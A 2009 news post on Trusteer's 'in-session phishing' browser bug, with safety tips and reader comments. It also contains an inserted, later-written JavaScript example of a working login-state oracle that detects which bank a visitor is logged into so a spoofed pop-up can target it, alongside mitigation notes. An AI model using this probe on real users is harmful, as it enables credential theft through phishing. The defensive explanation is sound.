Browser bug increases vulnerability to phishing

News Posted: Tue, Jan 13 2009 12:37 PM

On the heels of the phishing attacks on Twitter and Digg, where all that immediately seemed to be at risk were logon credentials to the social sites, comes a potentially much more insidious problem.

Security vendor Trusteer has found a JavaScript bug in all major browsers that makes it easier for crooks to steal your login information while you're doing your online banking. It's called "in-session phishing," and what makes it more difficult to detect is that it happens when you're already logged into your banking site.

The crooks can hack legitimate websites to create a pop-up window to verify your identity when you're already on the site. Security vendor Trusteer found the JavaScript bug in the biggest browsers - Internet Explorer, Firefox, Safari and Chrome. A press release from Trusteer explained how it would work:

A user logs onto their online banking application to perform some tasks. Leaving this browser window open, the user then navigates to other websites. A short time later a popup appears, allegedly from the banking website, which asks the user to retype their username and password because the session has expired, or complete a customer satisfaction survey, or participate in a promotion, etc. Since the user had recently logged onto the banking website, he/she will likely not suspect this popup is fraudulent and thus provide the requested details.

Because the window comes up when you're already on-site, you're more likely to believe it's real. The criminals can determine if you're logged on to one of 100 various banks or other financial institutions via a function in JavaScript, which Klein wouldn't discuss in more detail, because he didn't want to give the bad guys any ideas they didn't have already.

The good news: Trusteer has notified the browser makers and expects them to patch the bug.

And the company also offered these tips, which are common sense, but good advice nonetheless:
1. Deploy web browser security tools
2. Always log out of banking and other sensitive online applications and accounts before navigating to other websites
3. Be extremely suspicious of pop-ups that appear in a web session if you have not clicked a hyperlink.

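The post says the logged-in check is done "via a function in JavaScript" that Klein declined to describe. The following is an added example, not code from the original post and not the undisclosed bug Trusteer reported: it shows the generic "protected image" login-state oracle that was publicly known before 2009, in which a page on the attacker's (or a compromised) site requests a resource that only an authenticated user can fetch and watches whether the browser fires onload (a real image came back) or onerror (the server redirected to an HTML login page, which does not decode as an image). The target names, URLs and the victim's simulated session state are all hypothetical and constructed for the example.

```javascript
// Added example of a cross-site login-state oracle (the first half of an
// in-session phishing attack). Generic "protected image" technique; NOT the
// specific browser bug Trusteer declined to describe. Targets are hypothetical.

const TARGETS = [
  { name: 'Bank A',   url: 'https://bank-a.example/secure/avatar.png' },
  { name: 'Bank B',   url: 'https://bank-b.example/online/logo-authenticated.gif' },
  { name: 'Broker C', url: 'https://broker-c.example/portfolio/chart.png' },
];

// Browser-only probe: the browser attaches the target site's cookies to the
// image request, so a logged-in victim gets the real image (onload) while a
// logged-out one gets an HTML login redirect that fails to decode (onerror).
function probeWithImage(url) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    // Cache-bust so an image cached from an earlier session does not mask
    // a logged-out state.
    img.src = `${url}${url.includes('?') ? '&' : '?'}_=${Date.now()}`;
  });
}

// Pure decision logic, kept separate from the DOM so it can be exercised
// offline: given each target's probe outcome ('load' | 'error'), return the
// names of the institutions the attacker would impersonate in the pop-up.
function loggedInTargets(targets, outcomes) {
  return targets
    .filter((t) => outcomes.get(t.url) === 'load')
    .map((t) => t.name);
}

// Full in-browser flow: probe every candidate concurrently, then decide.
async function detectLoggedIn(targets, probe = probeWithImage) {
  const outcomes = new Map();
  await Promise.all(
    targets.map(async (t) => {
      outcomes.set(t.url, (await probe(t.url)) ? 'load' : 'error');
    })
  );
  return loggedInTargets(targets, outcomes);
}

// Offline simulation with a constructed victim state (no network, no DOM):
// the set holds the URLs whose site the victim is currently logged into.
function simulateVictim(loggedInUrls) {
  const outcomes = new Map();
  for (const t of TARGETS) {
    outcomes.set(t.url, loggedInUrls.has(t.url) ? 'load' : 'error');
  }
  return loggedInTargets(TARGETS, outcomes);
}

if (typeof window === 'undefined') {
  // Constructed scenario: the victim left a Bank B session open.
  console.log(simulateVictim(new Set([TARGETS[1].url])));
}
```

In a browser the attacker's script calls `detectLoggedIn(TARGETS)` from the page the victim wandered to and then opens the spoofed "your session has expired" window for whichever bank came back, which is why the pop-up in the post can name the right bank. The oracle only works because the browser sends the bank's cookies with a cross-site image request; modern SameSite cookie defaults and `Sec-Fetch-Site` headers blunt it, but none of that existed in 2009, which is why the post frames it as a browser problem rather than a bank problem. A practitioner's check on the server side: fetch a protected image URL with and without a session cookie and confirm the two responses are not distinguishable by load-versus-error (a 302 to an HTML login page for the unauthenticated case is exactly what this probe detects; a same-size placeholder image for both cases defeats this particular probe, though timing variants remain).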
Kiristo replied on Tue, Jan 13 2009 3:29 PM

Opera FTW! Although they probably just didn't mention Opera.


Can all be avoided by just looking at the web address. I could see some of my family members falling for this one though.
